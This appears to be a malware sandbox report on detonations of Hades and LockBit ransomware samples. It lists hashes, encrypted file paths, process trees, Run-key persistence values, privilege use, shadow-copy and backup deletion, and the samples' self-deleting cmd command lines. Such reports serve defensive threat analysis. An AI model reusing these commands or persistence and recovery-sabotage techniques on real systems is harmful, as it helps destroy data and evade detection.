SHA256 318cebc3c59b5327cfb7a69507f1dcbe92a15fc1abe429bf2359e0f9664d0b2d
SHA512 dc2da4492cbb7358ebddfacc246ff4bfc3a8b2fb3e76f47519a7e6ae47fce293607ab6980e64c0a5d4bd2687b2584fe6f4d85bb4888a11760aeb0d94e8246a1b

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml

MD5 794eb220b9c3fc6775b08dd9425c24b0
SHA1 99daf8158bd4914c06fc33302eec1d7f5897aa93
SHA256 40aa257d744c7d904e8f62392c91389cff523bae86eac46f075f79f6b67534b0
SHA512 c8d1f7bb4ddcd2c5c212eea495d776cda2fd1cc1d22e81c885bc45dfaca878b02810a0998c40ff861a8c78d52e7718444e046562c1e792590d881a1bb336ba86

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml

MD5 0dbdc71d198cd2da4d8c5c38f44e66a2
SHA1 dab7e173502d5f80bc3177b0a480561b208eb1d0
SHA256 5ad2dac3e0044649be6532c957950483092115cf2992d170a98a123cc0af2818
SHA512 28506aced7d9235e3ed73e2afacc54834295818b571a7633ce8a72e8dbdd0debd225dfc307e10d82a082dac0da757a8ab6eaf5cea6b671fde4d03ead14d86b29

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml

MD5 484651b39b9f0fc3ed8153db82b39eed
SHA1 859b44bdf204a55d21755358180adc62ede0e93f
SHA256 87bc15638540621224fcbd0f2fd0a73267465418b9b2897ea2fe5b977b990c35
SHA512 aac187baafb492a6930cebd87c41e67434bc40b724a844f3684f28b18846d01efc7f85e5fd0a017f1aceae341b616d2d925ec740039b17f01a9db1223972306a

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml

MD5 241e2f8d1c6df84c7de7debff798313c
SHA1 8d2f93801f8b0116fe159123faaf09d607eb1d19
SHA256 00fca714016de5a5b3207fb94fc30211cf745fd4b03c120862ffd88b5f024192
SHA512 11b376dc95d904b38bc541c26078b13843d632016e3b3bce3ff8d6315bf90d97b993d56fd76802e96bb87a3dbe1de3ebe92836d48aa35b2974785e9f69957e20

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml

MD5 b8e825d92d653fcf8f7dfb029406156b
SHA1 521f90b3653ee90e5b7b21a4732c7a8e2b2d9a92
SHA256 e9466955f535446cc4999e58805089c19bdd2cfc347519c912758cfc09e2564e
SHA512 059141bdc1e074bbbf7d43718ed5cb5ed2e4d663315f8433eb204ab083e6f9b43c4e84aec556cc190d59cd2dc1daa38343750cc18e45767de435230ecb1eaf28

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml

MD5 626282b09a4ad2e3debc34b0f723eab4
SHA1 2d6030babe784d001777aab4153415d991534689
SHA256 17a950101ceb4026932f7ff1902aabe83d835584d89081db151d72709333aeaa
SHA512 779e64f8a33388b0fe4c0627e9dc2b706b9d13ba3d54594bbe062d22f6ed1f04128ae3f0dbb32649052f1dd1e0aabf1c70b4db5a73816706753508a791dec428

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml

MD5 4e7c2b21080a655a39e47bd0e9949c43
SHA1 9b0e102fa821e1f48cdc31c533bccc5eebd4a54e
SHA256 b366b83f2732e1e45a454bcb03aaa49ba21b9b05e122a8adc88858fe540aef21
SHA512 1e5f51a49c3b56c22d8191dfccf8d53f24247870155c5e2864617d25d0bb4e3837a3927e7d1a056230b0eca0488e1c257c88f72da7c8ac962ae7482eb5d973a9

C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\OfficeMUISet.XML

MD5 fb7745147a1e73eb393f50685ed0307e
SHA1 0bbcb4de1fd8f558dca370e149af99388ca6021d
SHA256 36c960255b56d99527c46d829df70f2df299344a6c91ea0df037502310275ccf
SHA512 95cee37c3492fef7d3e531f6bd265ee675f426f2ae756b10936e4f9c47ab2208bdc05fc7ec8d33c94aa17f585eab71c23f1e0e86fa46085eca7247a77f87eeef

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml

MD5 516e13b880044e4e84825e930da9e6ae
SHA1 680014911828b15dab0684b553dd0fbb0975f79c
SHA256 f59de0da569599483a5aae0f0c4f2d2c10d97576c261f15235fb3b880a12463b
SHA512 1e49c1e00206b85e61ac038aedadf43084a7406796e09f5d31130bf9be8f25fb68e96fff049cb81e3d593833d38b9b7409efe7e7550760c12ceb7ac6ea41ee65

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml

MD5 7e1c1eb317e359233365bd065bb5f9dc
SHA1 c887b29d543207b7677f53b9fb605750223456c1
SHA256 8d3f2dab5a480547e1f49f8ce3d9d876da1428527a472b58caba6f6b76962305
SHA512 d37b150d1e97a0ad62163af5082567900cc24a62d4e425e4ed44787d9fb195168666534df17a602d8214bc05c78ae58fb76cc9a255cfcbb544db51978ea882b7

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml

MD5 372e32c507fb0c4050e561d31f013b85
SHA1 2d9a6839875d126b9ae008f91b6c8031da6fddba
SHA256 bc10dcc05f8cf25e4bd058724739fcd1d43270c26be23642d9d3b159990d7cc2
SHA512 35664e1ac284308f7a826a2b230a9603595011f74e3440424344e4bcaaf1a4ae3726b4c378bcfadc5a6e85aeb6802948517f29d7375771666a3a1a38726e6dca

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml

MD5 09ddfc512856bcb18938b61214b6983a
SHA1 e61c11bfb814f6d49bcd42df0713e54df25215fb
SHA256 43de088d9626ed9eab5827f7149283986e6ca82ac1aac350c7e51764e256f696
SHA512 9f445aac5388548f329d2cfb96d3f29b282599d34722502f1774e1fff7758981622847653b14330a642a4458710e69e706ab83972567f9436cb40eb449137ec0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp

MD5 cb3156c7903e0763a5d5f7b2298e833a
SHA1 0e8de3ba01ea0d2a10f6e706232b509901ce8506
SHA256 27ea5deef122c356c6cf0758cedfb350c0f5a645afeb2e171dedcf7c46de3af2
SHA512 df4467362eff7a1aff1e4074e2e3076365c3d1cdc211c06d40a6af2ad012a899cede7cb79a4f1d541040df4adc285b1419ea756ed082502bd0190e0e421a4cc8

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.TH.XML

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.AU.XML

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\readme.txt

C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UGUBWRQR\desktop.ini

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\msapplication.xml

C:\ProgramData\Microsoft\Windows\Caches\{41462E22-6FAD-4079-8CD7-8D2731E4A375}.2.ver0x0000000000000002.db

C:\ProgramData\Microsoft\Windows\Caches\{2388BCF4-53D9-4E4F-92D4-56774A7C0F36}.2.ver0x0000000000000001.db

C:\ProgramData\Microsoft\Windows\Caches\{1D2729A6-BF93-41C5-9972-10C6A9D3FDA8}.2.ver0x0000000000000001.db

C:\Users\desktop.ini

Analysis: behavioral25

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:40

Platform

win7-20240704-en

Max time kernel

1443s

Max time network

1454s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

Signatures

Hades Ransomware

ransomware hades

Hades payload

Description Indicator Process Target
N/A N/A N/A N/A

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A

Renames multiple (246) files with added filename extension

ransomware

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1360 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan
PID 2700 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan C:\Windows\system32\cmd.exe
PID 1360 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2992 wrote to memory of 1204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\waitfor.exe
PID 2992 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2852 wrote to memory of 612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan

C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan /go

C:\Windows\system32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan" & del "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan" & rd "C:\Users\Admin\AppData\Roaming\Play8Pla\"

C:\Windows\system32\cmd.exe

cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\waitfor.exe

waitfor /t 10 pause /d y

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan"

Network

N/A

Files

memory/1360-0-0x0000000001B60000-0x0000000001D22000-memory.dmp

memory/1360-1-0x0000000140000000-0x00000001401E2000-memory.dmp

\Users\Admin\AppData\Roaming\Play8Pla\Wwan

memory/2700-11-0x0000000001B70000-0x0000000001D32000-memory.dmp

memory/2700-12-0x0000000140000000-0x00000001401E2000-memory.dmp

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\HOW-TO-DECRYPT-gn9cj.txt

memory/1360-511-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2700-514-0x0000000140000000-0x00000001401E2000-memory.dmp

memory/2700-515-0x0000000001B70000-0x0000000001D32000-memory.dmp

memory/1360-517-0x0000000001B60000-0x0000000001D22000-memory.dmp

memory/1360-516-0x0000000140000000-0x00000001401E2000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 16:12

Platform

win7-20240705-en

Max time kernel

1561s

Max time network

1570s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (9368) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\"" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit-note.hta" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6CA8.tmp.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_right.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\de-DE\OmdProject.dll.mui C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\sports_disc_mask.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02048_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Civic.thmx C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BROCHURE.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-dialogs.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\settings.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00449_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107258.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\weather.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099204.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199429.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Modern.dotx C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\NextMenuButtonIcon.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGSIDEBR.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\init.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Basic\DEFAULT.XSL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\css\localizedSettings.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105338.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\BUTTON.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nassau C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\css\cpu.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\utilityfunctions.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287417.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14983_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\HEADER.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_on.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\gadget.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR48B.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\weather.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\gadget.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099155.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178523.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00345_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02794_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\logo.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\TileWallpaper = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\Desktop\WallpaperStyle = "2" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
